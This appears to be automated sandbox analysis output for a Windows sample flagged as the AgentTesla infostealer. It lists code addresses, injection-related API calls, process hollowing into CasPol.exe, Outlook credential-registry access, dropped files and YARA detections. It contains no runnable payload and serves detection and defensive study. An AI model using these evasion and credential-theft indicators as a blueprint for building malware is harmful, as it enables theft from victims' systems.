            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A166B1_2_034A166B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A166E1_2_034A166E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A167E1_2_034A167E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034ADE0E1_2_034ADE0E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2E021_2_034A2E02
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A1E2E1_2_034A1E2E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A16861_2_034A1686
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A16981_2_034A1698
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15461_2_034A1546
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2D461_2_034A2D46
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2D5E1_2_034A2D5E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034ACD5F1_2_034ACD5F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15561_2_034A1556
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A1D6D1_2_034A1D6D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A151A1_2_034A151A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15121_2_034A1512
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A152E1_2_034A152E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15261_2_034A1526
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A153E1_2_034A153E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2D3E1_2_034A2D3E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2D321_2_034A2D32
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2DDA1_2_034A2DDA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15DE1_2_034A15DE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2DD21_2_034A2DD2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15D61_2_034A15D6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2DEA1_2_034A2DEA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15EE1_2_034A15EE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2DE21_2_034A2DE2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15E61_2_034A15E6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2DFA1_2_034A2DFA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15FE1_2_034A15FE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2DF21_2_034A2DF2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A15F61_2_034A15F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A144A1_2_034A144A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2C4E1_2_034A2C4E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A14421_2_034A1442
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2C461_2_034A2C46
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A14591_2_034A1459
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2C5E1_2_034A2C5E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A14521_2_034A1452
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2C661_2_034A2C66
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2C761_2_034A2C76
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A14051_2_034A1405
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A142A1_2_034A142A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A14221_2_034A1422
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AC4231_2_034AC423
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A143A1_2_034A143A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A14321_2_034A1432
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A2C361_2_034A2C36
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_010443203_2_01044320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01043A503_2_01043A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0104D9303_2_0104D930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_010437083_2_01043708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0151C3183_2_0151C318
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_015197083_2_01519708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01516A003_2_01516A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01515A083_2_01515A08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0151C1C83_2_0151C1C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_015181F83_2_015181F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0151BAC83_2_0151BAC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01513EA03_2_01513EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01534DD83_2_01534DD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_015300403_2_01530040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0153634C3_2_0153634C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01535F703_2_01535F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01531F683_2_01531F68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0153AA703_2_0153AA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0153F6003_2_0153F600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_015300383_2_01530038
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_015346C03_2_015346C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0166B4393_2_0166B439
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_016627683_2_01662768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01661FF03_2_01661FF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0166DE783_2_0166DE78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0166AE983_2_0166AE98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_017411BC3_2_017411BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_0174E2283_2_0174E228
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01746DA03_2_01746DA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_017483C83_2_017483C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1F9B5E083_2_1F9B5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1F9B46C43_2_1F9B46C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1F9B5DC13_2_1F9B5DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_1F9B6AF13_2_1F9B6AF1
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: Process Memory Space: CasPol.exe PID: 624, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AD350 LdrLoadDll,NtAllocateVirtualMemory,1_2_034AD350
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AF025 NtProtectVirtualMemory,1_2_034AF025
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AFE79 NtResumeThread,1_2_034AFE79
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, 00000001.00000000.32783549360.000000000044B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameElasmosaur.exe2 vs SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeBinary or memory string: OriginalFilenameElasmosaur.exe2 vs SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeStatic PE information: invalid certificate
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Help.lnk.1.drLNK file: ..\AppData\Local\Temp\adda.txt
            Source: Unistall.lnk.1.drLNK file: ..\AppData\Local\Temp\dada.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\PsychopharmacologyJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/7@2/2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeVirustotal: Detection: 10%
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeReversingLabs: Detection: 23%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeFile created: C:\Users\user\AppData\Local\Temp\nsmD242.tmpJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404AB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1500:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1500:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000003.00000000.32918874491.0000000001120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_714630C0 push eax; ret 1_2_714630EE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349F369 push ebp; retf 1_2_0349F36C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034AD2B2 push esp; retf F014h1_2_034B1136
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A070E push dword ptr [ebx+ebx*2]; retf 1_2_034A0734
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A0716 push dword ptr [ebx+ebx*2]; retf 1_2_034A0734
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A4ECA push ebx; iretd 1_2_034A4ECC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A06EE push dword ptr [ebx+ebx*2]; retf 1_2_034A0734
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A06E0 push dword ptr [ebx+ebx*2]; retf 1_2_034A0734
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A06FE push dword ptr [ebx+ebx*2]; retf 1_2_034A0734
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A06F6 push dword ptr [ebx+ebx*2]; retf 1_2_034A0734
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349E542 pushad ; ret 1_2_0349E5FA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349E55E pushad ; ret 1_2_0349E5FA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349E553 pushad ; ret 1_2_0349E5FA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349E556 pushad ; ret 1_2_0349E5FA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349F566 push es; ret 1_2_0349F585
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_034A057E push ebx; iretd 1_2_034A058E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_0349E507 pushad ; ret 1_2_0349E5FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01049297 push eax; iretd 3_2_010492C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_01667E2F push edi; retn 0000h3_2_01667E31
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeCode function: 1_2_71461BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71461BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeFile created: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Portend.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
